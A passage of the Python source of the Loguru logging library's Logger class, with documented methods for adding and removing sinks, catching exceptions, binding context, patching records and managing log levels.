    +------------------------+---------+----------------------------------------+

    .. _file:

    .. rubric:: The file sinks

    If the sink is a |str| or a |Path|, the corresponding file will be opened for writing logs.
    The path can also contain a special ``"{time}"`` field that will be formatted with the
    current date at file creation.

    The ``rotation`` check is made before logging each message. If there is already an existing
    file with the same name that the file to be created, then the existing file is renamed by
    appending the date to its basename to prevent file overwriting. This parameter accepts:

    - an |int| which corresponds to the maximum file size in bytes before that the current
      logged file is closed and a new one started over.
    - a |timedelta| which indicates the frequency of each new rotation.
    - a |time| which specifies the hour when the daily rotation should occur.
    - a |str| for human-friendly parametrization of one of the previously enumerated types.
      Examples: ``"100 MB"``, ``"0.5 GB"``, ``"1 month 2 weeks"``, ``"4 days"``, ``"10h"``,
      ``"monthly"``, ``"18:00"``, ``"sunday"``, ``"w0"``, ``"monday at 12:00"``, ...
    - a |callable|_ which will be invoked before logging. It should accept two arguments: the
      logged message and the file object, and it should return ``True`` if the rotation should
      happen now, ``False`` otherwise.

    The ``retention`` occurs at rotation or at sink stop if rotation is ``None``. Files are
    selected if they match the pattern ``"basename(.*).ext(.*)"`` (possible time fields are
    beforehand replaced with ``.*``) based on the sink file. This parameter accepts:

    - an |int| which indicates the number of log files to keep, while older files are removed.
    - a |timedelta| which specifies the maximum age of files to keep.
    - a |str| for human-friendly parametrization of the maximum age of files to keep.
      Examples: ``"1 week, 3 days"``, ``"2 months"``, ...
    - a |callable|_ which will be invoked before the retention process. It should accept the
      list of log files as argument and process to whatever it wants (moving files, removing
      them, etc.).

    The ``compression`` happens at rotation or at sink stop if rotation is ``None``. This
    parameter accepts:

    - a |str| which corresponds to the compressed or archived file extension. This can be one
      of: ``"gz"``, ``"bz2"``, ``"xz"``, ``"lzma"``, ``"tar"``, ``"tar.gz"``, ``"tar.bz2"``,
      ``"tar.xz"``, ``"zip"``.
    - a |callable|_ which will be invoked before file termination. It should accept the path of
      the log file as argument and process to whatever it wants (custom compression, network
      sending, removing it, etc.).

    Either way, if you use a custom function designed according to your preferences, you must be
    very careful not to use the ``logger`` within your function. Otherwise, there is a risk that
    your program hang because of a deadlock.

    .. _color:

    .. rubric:: The color markups

    To add colors to your logs, you just have to enclose your format string with the appropriate
    tags (e.g. ``<red>some message</red>``). These tags are automatically removed if the sink
    doesn't support ansi codes. For convenience, you can use ``</>`` to close the last opening
    tag without repeating its name (e.g. ``<red>another message</>``).

    The special tag ``<level>`` (abbreviated with ``<lvl>``) is transformed according to
    the configured color of the logged message level.

    Tags which are not recognized will raise an exception during parsing, to inform you about
    possible misuse. If you wish to display a markup tag literally, you can escape it by
    prepending a ``\`` like for example ``\<blue>``. If, for some reason, you need to escape a
    string programmatically, note that the regex used internally to parse markup tags is
    ``r"\\?</?((?:[fb]g\s)?[^<>\s]*)>"``.

    Note that when logging a message with ``opt(colors=True)``, color tags present in the
    formatting arguments (``args`` and ``kwargs``) are completely ignored. This is important if
    you need to log strings containing markups that might interfere with the color tags (in this
    case, do not use f-string).

    Here are the available tags (note that compatibility may vary depending on terminal):

    +------------------------------------+--------------------------------------+
    | Color (abbr)                       | Styles (abbr)                        |
    +====================================+======================================+
    | Black (k)                          | Bold (b)                             |
    +------------------------------------+--------------------------------------+
    | Blue (e)                           | Dim (d)                              |
    +------------------------------------+--------------------------------------+
    | Cyan (c)                           | Normal (n)                           |
    +------------------------------------+--------------------------------------+
    | Green (g)                          | Italic (i)                           |
    +------------------------------------+--------------------------------------+
    | Magenta (m)                        | Underline (u)                        |
    +------------------------------------+--------------------------------------+
    | Red (r)                            | Strike (s)                           |
    +------------------------------------+--------------------------------------+
    | White (w)                          | Reverse (v)                          |
    +------------------------------------+--------------------------------------+
    | Yellow (y)                         | Blink (l)                            |
    +------------------------------------+--------------------------------------+
    |                                    | Hide (h)                             |
    +------------------------------------+--------------------------------------+

    Usage:

    +-----------------+-------------------------------------------------------------------+
    | Description     | Examples                                                          |
    |                 +---------------------------------+---------------------------------+
    |                 | Foreground                      | Background                      |
    +=================+=================================+=================================+
    | Basic colors    | ``<red>``, ``<r>``              | ``<GREEN>``, ``<G>``            |
    +-----------------+---------------------------------+---------------------------------+
    | Light colors    | ``<light-blue>``, ``<le>``      | ``<LIGHT-CYAN>``, ``<LC>``      |
    +-----------------+---------------------------------+---------------------------------+
    | 8-bit colors    | ``<fg 86>``, ``<fg 255>``       | ``<bg 42>``, ``<bg 9>``         |
    +-----------------+---------------------------------+---------------------------------+
    | Hex colors      | ``<fg #00005f>``, ``<fg #EE1>`` | ``<bg #AF5FD7>``, ``<bg #fff>`` |
    +-----------------+---------------------------------+---------------------------------+
    | RGB colors      | ``<fg 0,95,0>``                 | ``<bg 72,119,65>``              |
    +-----------------+---------------------------------+---------------------------------+
    | Stylizing       | ``<bold>``, ``<b>``,  ``<underline>``, ``<u>``                    |
    +-----------------+-------------------------------------------------------------------+

    .. _env:

    .. rubric:: The environment variables

    The default values of sink parameters can be entirely customized. This is particularly
    useful if you don't like the log format of the pre-configured sink.

    Each of the |add| default parameter can be modified by setting the ``LOGURU_[PARAM]``
    environment variable. For example on Linux: ``export LOGURU_FORMAT="{time} - {message}"``
    or ``export LOGURU_DIAGNOSE=NO``.

    The default levels' attributes can also be modified by setting the ``LOGURU_[LEVEL]_[ATTR]``
    environment variable. For example, on Windows: ``setx LOGURU_DEBUG_COLOR "<blue>"``
    or ``setx LOGURU_TRACE_ICON "🚀"``. If you use the ``set`` command, do not include quotes
    but escape special symbol as needed, e.g. ``set LOGURU_DEBUG_COLOR=^<blue^>``.

    If you want to disable the pre-configured sink, you can set the ``LOGURU_AUTOINIT``
    variable to ``False``.

    On Linux, you will probably need to edit the ``~/.profile`` file to make this persistent. On
    Windows, don't forget to restart your terminal for the change to be taken into account.

    Examples
    --------
    >>> logger.add(sys.stdout, format="{time} - {level} - {message}", filter="sub.module")
    >>> logger.add("file_{time}.log", level="TRACE", rotation="100 MB")

    >>> def debug_only(record):
    ...     return record["level"].name == "DEBUG"
    ...
    >>> logger.add("debug.log", filter=debug_only)  # Other levels are filtered out

    >>> def my_sink(message):
    ...     record = message.record
    ...     update_db(message, time=record["time"], level=record["level"])
    ...
    >>> logger.add(my_sink)

    >>> level_per_module = {
    ...     "": "DEBUG",
    ...     "third.lib": "WARNING",
    ...     "anotherlib": False
    ... }
    >>> logger.add(lambda m: print(m, end=""), filter=level_per_module, level=0)

    >>> async def publish(message):
    ...     await api.post(message)
    ...
    >>> logger.add(publish, serialize=True)

    >>> from logging import StreamHandler
    >>> logger.add(StreamHandler(sys.stderr), format="{message}")

    >>> class RandomStream:
    ...     def __init__(self, seed, threshold):
    ...         self.threshold = threshold
    ...         random.seed(seed)
    ...     def write(self, message):
    ...         if random.random() > self.threshold:
    ...             print(message)
    ...
    >>> stream_object = RandomStream(seed=12345, threshold=0.25)
    >>> logger.add(stream_object, level="INFO")
    """
    # Reserve a unique handler id under the lock; the rest of the validation
    # below runs lock-free and the handler is only published at the very end.
    with self._core.lock:
        handler_id = next(self._core.handlers_count)

    error_interceptor = ErrorInterceptor(catch, handler_id)

    # Serialized output is machine-read, so never colorize it by default.
    if colorize is None and serialize:
        colorize = False

    # Dispatch on the sink type and normalize everything into "wrapped_sink"
    # plus the encoding / line terminator / exception prefix it requires.
    if isinstance(sink, (str, PathLike)):
        path = sink
        name = "'%s'" % path

        if colorize is None:
            colorize = False

        # Remaining **kwargs (rotation, retention, mode, ...) belong to the
        # file sink; they are consumed here so the check below doesn't fire.
        wrapped_sink = FileSink(path, **kwargs)
        kwargs = {}
        encoding = wrapped_sink.encoding
        terminator = "\n"
        exception_prefix = ""
    elif hasattr(sink, "write") and callable(sink.write):
        name = getattr(sink, "name", None) or repr(sink)

        # For streams, colorization is auto-detected (tty or not) and the
        # stream may need to be wrapped by colorama on Windows.
        if colorize is None:
            colorize = _colorama.should_colorize(sink)

        if colorize is True and _colorama.should_wrap(sink):
            stream = _colorama.wrap(sink)
        else:
            stream = sink

        wrapped_sink = StreamSink(stream)
        encoding = getattr(sink, "encoding", None)
        terminator = "\n"
        exception_prefix = ""
    elif isinstance(sink, logging.Handler):
        name = repr(sink)

        if colorize is None:
            colorize = False

        # Standard handlers add their own newline, hence the empty terminator
        # and the leading newline before formatted exceptions.
        wrapped_sink = StandardSink(sink)
        encoding = getattr(sink, "encoding", None)
        terminator = ""
        exception_prefix = "\n"
    elif iscoroutinefunction(sink) or iscoroutinefunction(getattr(sink, "__call__", None)):
        name = getattr(sink, "__name__", None) or repr(sink)

        if colorize is None:
            colorize = False

        loop = kwargs.pop("loop", None)

        # The worker thread needs an event loop, it can't create a new one internally because it
        # has to be accessible by the user while calling "complete()", instead we use the global
        # one when the sink is added. If "enqueue=False" the event loop is dynamically retrieved
        # at each logging call, which is much more convenient. However, coroutine can't access
        # running loop in Python 3.5.2 and earlier versions, see python/asyncio#452.
        if enqueue and loop is None:
            loop = asyncio.get_event_loop()

        coro = sink if iscoroutinefunction(sink) else sink.__call__
        wrapped_sink = AsyncSink(coro, loop, error_interceptor)
        encoding = "utf8"
        terminator = "\n"
        exception_prefix = ""
    elif callable(sink):
        name = getattr(sink, "__name__", None) or repr(sink)

        if colorize is None:
            colorize = False

        wrapped_sink = CallableSink(sink)
        encoding = "utf8"
        terminator = "\n"
        exception_prefix = ""
    else:
        raise TypeError("Cannot log to objects of type '%s'" % type(sink).__name__)

    # Any kwargs left at this point were not consumed by a file sink and are
    # therefore invalid for the chosen sink type.
    if kwargs:
        raise TypeError("add() got an unexpected keyword argument '%s'" % next(iter(kwargs)))

    # Normalize the "filter" argument (None / "" / str / dict / callable)
    # into a single "filter_func" callable (or None).
    if filter is None:
        filter_func = None
    elif filter == "":
        filter_func = _filters.filter_none
    elif isinstance(filter, str):
        parent = filter + "."
        length = len(parent)
        filter_func = functools.partial(_filters.filter_by_name, parent=parent, length=length)
    elif isinstance(filter, dict):
        level_per_module = {}
        for module, level_ in filter.items():
            if module is not None and not isinstance(module, str):
                raise TypeError(
                    "The filter dict contains an invalid module, "
                    "it should be a string (or None), not: '%s'" % type(module).__name__
                )
            if level_ is False:
                levelno_ = False
            elif level_ is True:
                levelno_ = 0
            elif isinstance(level_, str):
                try:
                    levelno_ = self.level(level_).no
                except ValueError:
                    raise ValueError(
                        "The filter dict contains a module '%s' associated to a level name "
                        "which does not exist: '%s'" % (module, level_)
                    )
            elif isinstance(level_, int):
                levelno_ = level_
            else:
                raise TypeError(
                    "The filter dict contains a module '%s' associated to an invalid level, "
                    "it should be an integer, a string or a boolean, not: '%s'"
                    % (module, type(level_).__name__)
                )
            # NOTE: "False < 0" is falsy, so the "discard all" sentinel above
            # passes this validation unchanged.
            if levelno_ < 0:
                raise ValueError(
                    "The filter dict contains a module '%s' associated to an invalid level, "
                    "it should be a positive integer, not: '%d'" % (module, levelno_)
                )
            level_per_module[module] = levelno_
        filter_func = functools.partial(
            _filters.filter_by_level, level_per_module=level_per_module
        )
    elif callable(filter):
        if filter == builtins.filter:
            raise ValueError(
                "The built-in 'filter()' function cannot be used as a 'filter' parameter, "
                "this is most likely a mistake (please double-check the arguments passed "
                "to 'logger.add()')."
            )
        filter_func = filter
    else:
        raise TypeError(
            "Invalid filter, it should be a function, a string or a dict, not: '%s'"
            % type(filter).__name__
        )

    # Resolve "level" (name or number) to a non-negative integer threshold.
    if isinstance(level, str):
        levelno = self.level(level).no
    elif isinstance(level, int):
        levelno = level
    else:
        raise TypeError(
            "Invalid level, it should be an integer or a string, not: '%s'"
            % type(level).__name__
        )

    if levelno < 0:
        raise ValueError(
            "Invalid level value, it should be a positive integer, not: %d" % levelno
        )

    # A string format is pre-compiled once (with terminator and exception
    # field appended); a callable format is invoked per-record ("dynamic").
    if isinstance(format, str):
        try:
            formatter = Colorizer.prepare_format(format + terminator + "{exception}")
        except ValueError as e:
            raise ValueError(
                "Invalid format, color markups could not be parsed correctly"
            ) from e
        is_formatter_dynamic = False
    elif callable(format):
        if format == builtins.format:
            raise ValueError(
                "The built-in 'format()' function cannot be used as a 'format' parameter, "
                "this is most likely a mistake (please double-check the arguments passed "
                "to 'logger.add()')."
            )
        formatter = format
        is_formatter_dynamic = True
    else:
        raise TypeError(
            "Invalid format, it should be a string or a function, not: '%s'"
            % type(format).__name__
        )

    if not isinstance(encoding, str):
        encoding = "ascii"

    # Build the handler and publish it atomically so concurrent logging calls
    # observe a consistent (handlers, min_level) pair.
    with self._core.lock:
        exception_formatter = ExceptionFormatter(
            colorize=colorize,
            encoding=encoding,
            diagnose=diagnose,
            backtrace=backtrace,
            hidden_frames_filename=self.catch.__code__.co_filename,
            prefix=exception_prefix,
        )

        handler = Handler(
            name=name,
            sink=wrapped_sink,
            levelno=levelno,
            formatter=formatter,
            is_formatter_dynamic=is_formatter_dynamic,
            filter_=filter_func,
            colorize=colorize,
            serialize=serialize,
            enqueue=enqueue,
            id_=handler_id,
            error_interceptor=error_interceptor,
            exception_formatter=exception_formatter,
            levels_ansi_codes=self._core.levels_ansi_codes,
        )

        # Copy-on-write: replace the handlers dict rather than mutating it,
        # so readers iterating the old dict are unaffected.
        handlers = self._core.handlers.copy()
        handlers[handler_id] = handler
        self._core.min_level = min(self._core.min_level, levelno)
        self._core.handlers = handlers

    return handler_id
def remove(self, handler_id=None):
    """Remove a previously added handler and stop sending logs to its sink.

    Parameters
    ----------
    handler_id : |int| or ``None``
        The id of the sink to remove, as it was returned by the |add| method. If ``None``, all
        handlers are removed. The pre-configured handler is guaranteed to have the index ``0``.

    Raises
    ------
    ValueError
        If ``handler_id`` is not ``None`` but there is no active handler with such id.

    Examples
    --------
    >>> i = logger.add(sys.stderr, format="{message}")
    >>> logger.info("Logging")
    Logging
    >>> logger.remove(i)
    >>> logger.info("No longer logging")
    """
    if handler_id is not None and not isinstance(handler_id, int):
        raise TypeError(
            "Invalid handler id, it should be an integer as returned "
            "by the 'add()' method (or None), not: '%s'" % type(handler_id).__name__
        )

    with self._core.lock:
        handlers = self._core.handlers.copy()

        if handler_id is not None and handler_id not in handlers:
            raise ValueError("There is no existing handler with id %d" % handler_id) from None

        # ``None`` means "remove them all", otherwise just the requested one.
        targets = list(handlers) if handler_id is None else [handler_id]

        for target in targets:
            removed = handlers.pop(target)

            # Publish the updated core state before stopping the sink, in
            # case "stop()" raises an exception.
            remaining_levels = [h.levelno for h in handlers.values()]
            self._core.min_level = min(remaining_levels, default=float("inf"))
            self._core.handlers = handlers

            removed.stop()
def complete(self):
    """Wait for the end of enqueued messages and asynchronous tasks scheduled by handlers.

    This method proceeds in two steps: first it waits for all logging messages added to handlers
    with ``enqueue=True`` to be processed, then it returns an object that can be awaited to
    finalize all logging tasks added to the event loop by coroutine sinks.

    It can be called from non-asynchronous code. This is especially recommended when the
    ``logger`` is utilized with ``multiprocessing`` to ensure messages put to the internal
    queue have been properly transmitted before leaving a child process.

    The returned object should be awaited before the end of a coroutine executed by
    |asyncio.run| or |loop.run_until_complete| to ensure all asynchronous logging messages are
    processed. The function |asyncio.get_event_loop| is called beforehand, only tasks scheduled
    in the same loop that the current one will be awaited by the method.

    Returns
    -------
    :term:`awaitable`
        An awaitable object which ensures all asynchronous logging calls are completed when
        awaited.

    Examples
    --------
    >>> async def sink(message):
    ...     await asyncio.sleep(0.1)  # IO processing...
    ...     print(message, end="")
    ...
    >>> async def work():
    ...     logger.info("Start")
    ...     logger.info("End")
    ...     await logger.complete()
    ...
    >>> logger.add(sink)
    1
    >>> asyncio.run(work())
    Start
    End

    >>> def process():
    ...     logger.info("Message sent from the child")
    ...     logger.complete()
    ...
    >>> logger.add(sys.stderr, enqueue=True)
    1
    >>> process = multiprocessing.Process(target=process)
    >>> process.start()
    >>> process.join()
    Message sent from the child
    """
    # Step 1 (synchronous): snapshot handlers under the lock, then flush the
    # internal queues outside of it so flushing cannot block other logger calls.
    with self._core.lock:
        handlers = self._core.handlers.copy()
    for handler in handlers.values():
        handler.complete_queue()

    # Step 2 (asynchronous): the returned object, when awaited, drains the
    # pending coroutine-sink tasks. Note the "self_" parameter name: "self"
    # inside "__await__" must keep referring to the Logger instance captured
    # by this closure.
    class AwaitableCompleter:
        def __await__(self_):
            with self._core.lock:
                handlers = self._core.handlers.copy()
            for handler in handlers.values():
                yield from handler.complete_async().__await__()

    return AwaitableCompleter()
def catch(
    self,
    exception=Exception,
    *,
    level="ERROR",
    reraise=False,
    onerror=None,
    exclude=None,
    default=None,
    message="An error has been caught in function '{record[function]}', "
    "process '{record[process].name}' ({record[process].id}), "
    "thread '{record[thread].name}' ({record[thread].id}):"
):
    """Return a decorator to automatically log possibly caught error in wrapped function.

    This is useful to ensure unexpected exceptions are logged, the entire program can be
    wrapped by this method. This is also very useful to decorate |Thread.run| methods while
    using threads to propagate errors to the main logger thread.

    Note that the visibility of variables values (which uses the great |better_exceptions|_
    library from `@Qix-`_) depends on the ``diagnose`` option of each configured sink.

    The returned object can also be used as a context manager.

    Parameters
    ----------
    exception : |Exception|, optional
        The type of exception to intercept. If several types should be caught, a tuple of
        exceptions can be used too.
    level : |str| or |int|, optional
        The level name or severity with which the message should be logged.
    reraise : |bool|, optional
        Whether the exception should be raised again and hence propagated to the caller.
    onerror : |callable|_, optional
        A function that will be called if an error occurs, once the message has been logged.
        It should accept the exception instance as it sole argument.
    exclude : |Exception|, optional
        A type of exception (or a tuple of types) that will be purposely ignored and hence
        propagated to the caller without being logged.
    default : optional
        The value to be returned by the decorated function if an error occurred without being
        re-raised.
    message : |str|, optional
        The message that will be automatically logged if an exception occurs. Note that it will
        be formatted with the ``record`` attribute.

    Returns
    -------
    :term:`decorator` / :term:`context manager`
        An object that can be used to decorate a function or as a context manager to log
        exceptions possibly caught.

    Examples
    --------
    >>> @logger.catch
    ... def f(x):
    ...     100 / x
    ...
    >>> def g():
    ...     f(10)
    ...     f(0)
    ...
    >>> g()
    ERROR - An error has been caught in function 'g', process 'Main' (367), thread 'ch1' (1398):
    Traceback (most recent call last):
      File "program.py", line 12, in <module>
        g()
        └ <function g at 0x7f225fe2bc80>
    > File "program.py", line 10, in g
        f(0)
        └ <function f at 0x7f225fe2b9d8>
      File "program.py", line 6, in f
        100 / x
              └ 0
    ZeroDivisionError: division by zero

    >>> with logger.catch(message="Because we never know..."):
    ...     main()  # No exception, no logs

    >>> # Use 'onerror' to prevent the program exit code to be 0 (if 'reraise=False') while
    >>> # also avoiding the stacktrace to be duplicated on stderr (if 'reraise=True').
    >>> @logger.catch(onerror=lambda _: sys.exit(1))
    ... def main():
    ...     1 / 0
    """
    # Support bare "@logger.catch" (no parentheses): when the sole argument is
    # a callable that is not an exception class, treat it as the decorated
    # function and apply a default-configured catcher to it.
    if callable(exception) and (
        not isclass(exception) or not issubclass(exception, BaseException)
    ):
        return self.catch()(exception)

    # "self_" is the Catcher instance; "self" (from the enclosing closure)
    # remains the Logger. Both are intentionally in scope below.
    class Catcher:
        def __init__(self_, from_decorator):
            self_._from_decorator = from_decorator

        def __enter__(self_):
            return None

        def __exit__(self_, type_, value, traceback_):
            if type_ is None:
                return

            if not issubclass(type_, exception):
                return False

            if exclude is not None and issubclass(type_, exclude):
                return False

            from_decorator = self_._from_decorator
            _, depth, _, *options = self._options
            # The decorator adds one extra wrapper frame between the user code
            # and this "__exit__", so the frame lookup must skip one more level.
            if from_decorator:
                depth += 1

            catch_options = [(type_, value, traceback_), depth, True] + options
            level_id, static_level_no = self._dynamic_level(level)
            self._log(level_id, static_level_no, from_decorator, catch_options, message, (), {})

            if onerror is not None:
                onerror(value)

            # Returning True from "__exit__" suppresses the exception.
            return not reraise

        def __call__(_, function):
            catcher = Catcher(True)
            # Pick a wrapper matching the wrapped function's kind so that
            # "async def" and generator functions keep their nature.
            # "return default" runs only when the exception was suppressed
            # (the "with" block exited without returning).
            if iscoroutinefunction(function):
                async def catch_wrapper(*args, **kwargs):
                    with catcher:
                        return await function(*args, **kwargs)
                    return default
            elif isgeneratorfunction(function):
                def catch_wrapper(*args, **kwargs):
                    with catcher:
                        return (yield from function(*args, **kwargs))
                    return default
            else:
                def catch_wrapper(*args, **kwargs):
                    with catcher:
                        return function(*args, **kwargs)
                    return default

            functools.update_wrapper(catch_wrapper, function)
            return catch_wrapper

    return Catcher(False)
def opt(
    self,
    *,
    exception=None,
    record=False,
    lazy=False,
    colors=False,
    raw=False,
    capture=True,
    depth=0,
    ansi=False
):
    r"""Parametrize a logging call to slightly change generated log message.

    Note that it's not possible to chain |opt| calls, the last one takes precedence over the
    others as it will "reset" the options to their default values.

    Parameters
    ----------
    exception : |bool|, |tuple| or |Exception|, optional
        If it does not evaluate as ``False``, the passed exception is formatted and added to the
        log message. It could be an |Exception| object or a ``(type, value, traceback)`` tuple,
        otherwise the exception information is retrieved from |sys.exc_info|.
    record : |bool|, optional
        If ``True``, the record dict contextualizing the logging call can be used to format the
        message by using ``{record[key]}`` in the log message.
    lazy : |bool|, optional
        If ``True``, the logging call attribute to format the message should be functions which
        will be called only if the level is high enough. This can be used to avoid expensive
        functions if not necessary.
    colors : |bool|, optional
        If ``True``, logged message will be colorized according to the markups it possibly
        contains.
    raw : |bool|, optional
        If ``True``, the formatting of each sink will be bypassed and the message will be sent
        as is.
    capture : |bool|, optional
        If ``False``, the ``**kwargs`` of logged message will not automatically populate
        the ``extra`` dict (although they are still used for formatting).
    depth : |int|, optional
        Specify which stacktrace should be used to contextualize the logged message. This is
        useful while using the logger from inside a wrapped function to retrieve worthwhile
        information.
    ansi : |bool|, optional
        Deprecated since version 0.4.1: the ``ansi`` parameter will be removed in Loguru 1.0.0,
        it is replaced by ``colors`` which is a more appropriate name.

    Returns
    -------
    :class:`~Logger`
        A logger wrapping the core logger, but transforming logged message adequately before
        sending.

    Examples
    --------
    >>> try:
    ...     1 / 0
    ... except ZeroDivisionError:
    ...     logger.opt(exception=True).debug("Exception logged with debug level:")
    ...
    [18:10:02] DEBUG in '<module>' - Exception logged with debug level:
    Traceback (most recent call last, catch point marked):
    > File "<stdin>", line 2, in <module>
    ZeroDivisionError: division by zero

    >>> logger.opt(record=True).info("Current line is: {record[line]}")
    [18:10:33] INFO in '<module>' - Current line is: 1

    >>> logger.opt(lazy=True).debug("If sink <= DEBUG: {x}", x=lambda: math.factorial(2**5))
    [18:11:19] DEBUG in '<module>' - If sink <= DEBUG: 263130836933693530167218012160000000

    >>> logger.opt(colors=True).warning("We got a <red>BIG</red> problem")
    [18:11:30] WARNING in '<module>' - We got a BIG problem

    >>> logger.opt(raw=True).debug("No formatting\n")
    No formatting

    >>> logger.opt(capture=False).info("Displayed but not captured: {value}", value=123)
    [18:11:41] Displayed but not captured: 123

    >>> def wrapped():
    ...     logger.opt(depth=1).info("Get parent context")
    ...
    >>> def func():
    ...     wrapped()
    ...
    >>> func()
    [18:11:54] DEBUG in 'func' - Get parent context
    """
    # Legacy alias: "ansi=True" behaves exactly like "colors=True".
    if ansi:
        colors = True
        warnings.warn(
            "The 'ansi' parameter is deprecated, please use 'colors' instead",
            DeprecationWarning,
        )

    # Keep the last two options (patcher, extra) from the current logger and
    # replace everything else with the freshly provided values.
    args = self._options[-2:]
    return Logger(self._core, exception, depth, record, lazy, colors, raw, capture, *args)
def bind(__self, **kwargs):
    """Bind attributes to the ``extra`` dict of each logged message record.

    This is the primary way to attach custom, per-logger context to every
    message sent through the returned object.

    Parameters
    ----------
    **kwargs
        Mapping between keys and values that will be added to the ``extra`` dict.

    Returns
    -------
    :class:`~Logger`
        A logger wrapping the core logger, but which sends record with the customized ``extra``
        dict.

    Examples
    --------
    >>> logger.add(sys.stderr, format="{extra[ip]} - {message}")
    >>> class Server:
    ...     def __init__(self, ip):
    ...         self.ip = ip
    ...         self.logger = logger.bind(ip=ip)
    ...     def call(self, message):
    ...         self.logger.info(message)
    ...
    >>> instance_1 = Server("192.168.0.200")
    >>> instance_2 = Server("127.0.0.1")
    >>> instance_1.call("First instance")
    192.168.0.200 - First instance
    >>> instance_2.call("Second instance")
    127.0.0.1 - Second instance
    """
    # The "extra" dict is the last slot of the options tuple; merge the new
    # bindings over it and build a sibling logger sharing the same core.
    options = list(__self._options)
    extra = options.pop()
    merged = {**extra, **kwargs}
    return Logger(__self._core, *options, merged)
@contextlib.contextmanager
def contextualize(__self, **kwargs):
    """Bind attributes to the context-local ``extra`` dict while inside the ``with`` block.

    Contrary to |bind| there is no ``logger`` returned, the ``extra`` dict is modified in-place
    and updated globally. Most importantly, it uses |contextvars| which means that
    contextualized values are unique to each threads and asynchronous tasks.

    The ``extra`` dict will retrieve its initial state once the context manager is exited.

    Parameters
    ----------
    **kwargs
        Mapping between keys and values that will be added to the context-local ``extra`` dict.

    Returns
    -------
    :term:`context manager` / :term:`decorator`
        A context manager (usable as a decorator too) that will bind the attributes once entered
        and restore the initial state of the ``extra`` dict while exited.

    Examples
    --------
    >>> logger.add(sys.stderr, format="{message} | {extra}")
    1
    >>> def task():
    ...     logger.info("Processing!")
    ...
    >>> with logger.contextualize(task_id=123):
    ...     task()
    ...
    Processing! | {'task_id': 123}
    >>> logger.info("Done.")
    Done. | {}
    """
    # Merge under the lock so concurrent contextualize() calls don't lose
    # updates; the lock is released before yielding to avoid holding it for
    # the whole "with" block.
    with __self._core.lock:
        new_context = {**context.get(), **kwargs}
        token = context.set(new_context)
    try:
        yield
    finally:
        # Resetting via the token restores the exact previous state, which
        # makes nested "contextualize()" blocks unwind correctly.
        with __self._core.lock:
            context.reset(token)
def patch(self, patcher):
    """Attach a function to modify the record dict created by each logging call.

    The ``patcher`` may be used to update the record on-the-fly before it's propagated to the
    handlers. This allows the "extra" dict to be populated with dynamic values and also permits
    advanced modifications of the record emitted while logging a message. The function is called
    once before sending the log message to the different handlers.

    It is recommended to apply modification on the ``record["extra"]`` dict rather than on the
    ``record`` dict itself, as some values are used internally by `Loguru`, and modify them may
    produce unexpected results.

    Parameters
    ----------
    patcher: |callable|_
        The function to which the record dict will be passed as the sole argument. This function
        is in charge of updating the record in-place, the function does not need to return any
        value, the modified record object will be re-used.

    Returns
    -------
    :class:`~Logger`
        A logger wrapping the core logger, but which records are passed through the ``patcher``
        function before being sent to the added handlers.

    Examples
    --------
    >>> logger.add(sys.stderr, format="{extra[utc]} {message}")
    >>> logger = logger.patch(lambda record: record["extra"].update(utc=datetime.utcnow()))
    >>> logger.info("That's way, you can log messages with time displayed in UTC")

    >>> def wrapper(func):
    ...     @functools.wraps(func)
    ...     def wrapped(*args, **kwargs):
    ...         logger.patch(lambda r: r.update(function=func.__name__)).info("Wrapped!")
    ...         return func(*args, **kwargs)
    ...     return wrapped

    >>> def recv_record_from_network(pipe):
    ...     record = pickle.loads(pipe.read())
    ...     level, message = record["level"], record["message"]
    ...     logger.patch(lambda r: r.update(record)).log(level, message)
    """
    # Replace only the patcher slot (second-to-last option); everything else,
    # including the "extra" dict, is carried over unchanged.
    *options, _, extra = self._options
    return Logger(self._core, *options, patcher, extra)
def level(self, name, no=None, color=None, icon=None):
    """Add, update or retrieve a logging level.

    Logging levels are defined by their ``name`` to which a severity ``no``, an ansi ``color``
    tag and an ``icon`` are associated and possibly modified at run-time. To |log| to a custom
    level, you should necessarily use its name, the severity number is not linked back to levels
    name (this implies that several levels can share the same severity).

    To add a new level, its ``name`` and its ``no`` are required. A ``color`` and an ``icon``
    can also be specified or will be empty by default.

    To update an existing level, pass its ``name`` with the parameters to be changed. It is not
    possible to modify the ``no`` of a level once it has been added.

    To retrieve level information, the ``name`` solely suffices.

    Parameters
    ----------
    name : |str|
        The name of the logging level.
    no : |int|
        The severity of the level to be added or updated.
    color : |str|
        The color markup of the level to be added or updated.
    icon : |str|
        The icon of the level to be added or updated.

    Returns
    -------
    ``Level``
        A |namedtuple| containing information about the level.

    Raises
    ------
    ValueError
        If there is no level registered with such ``name``.

    Examples
    --------
    >>> level = logger.level("ERROR")
    >>> print(level)
    Level(name='ERROR', no=40, color='<red><bold>', icon='❌')
    >>> logger.add(sys.stderr, format="{level.no} {level.icon} {message}")
    1
    >>> logger.level("CUSTOM", no=15, color="<blue>", icon="@")
    Level(name='CUSTOM', no=15, color='<blue>', icon='@')
    >>> logger.log("CUSTOM", "Logging...")
    15 @ Logging...
    >>> logger.level("WARNING", icon=r"/!\\")
    Level(name='WARNING', no=30, color='<yellow><bold>', icon='/!\\\\')
    >>> logger.warning("Updated!")
    30 /!\\ Updated!
    """
    if not isinstance(name, str):
        raise TypeError(
            "Invalid level name, it should be a string, not: '%s'" % type(name).__name__
        )

    # Retrieval mode: no modification argument was given at all.
    if no is color is icon is None:
        try:
            return self._core.levels[name]
        except KeyError:
            raise ValueError("Level '%s' does not exist" % name) from None

    if name not in self._core.levels:
        # Creation mode: a severity number is mandatory for a new level.
        if no is None:
            raise ValueError(
                "Level '%s' does not exist, you have to create it by specifying a level no"
                % name
            )
        else:
            old_color, old_icon = "", " "
    elif no is not None:
        # Update mode: the severity of an existing level is immutable.
        raise TypeError("Level '%s' already exists, you can't update its severity no" % name)
    else:
        _, no, old_color, old_icon = self.level(name)

    # Unspecified attributes keep their previous (or default) values.
    if color is None:
        color = old_color

    if icon is None:
        icon = old_icon

    if not isinstance(no, int):
        raise TypeError(
            "Invalid level no, it should be an integer, not: '%s'" % type(no).__name__
        )

    if no < 0:
        raise ValueError("Invalid level no, it should be a positive integer, not: %d" % no)

    ansi = Colorizer.ansify(color)
    level = Level(name, no, color, icon)

    with self._core.lock:
        self._core.levels[name] = level
        self._core.levels_ansi_codes[name] = ansi
        # Handlers pre-compute per-level formats, so they must be refreshed.
        for handler in self._core.handlers.values():
            handler.update_format(name)

    return level
def disable(self, name):
    """Disable logging of messages coming from ``name`` module and its children.

    Library authors using `Loguru` should call this so their internal logs do
    not disturb users by default.

    Note that in some rare circumstances, it is not possible for `Loguru` to
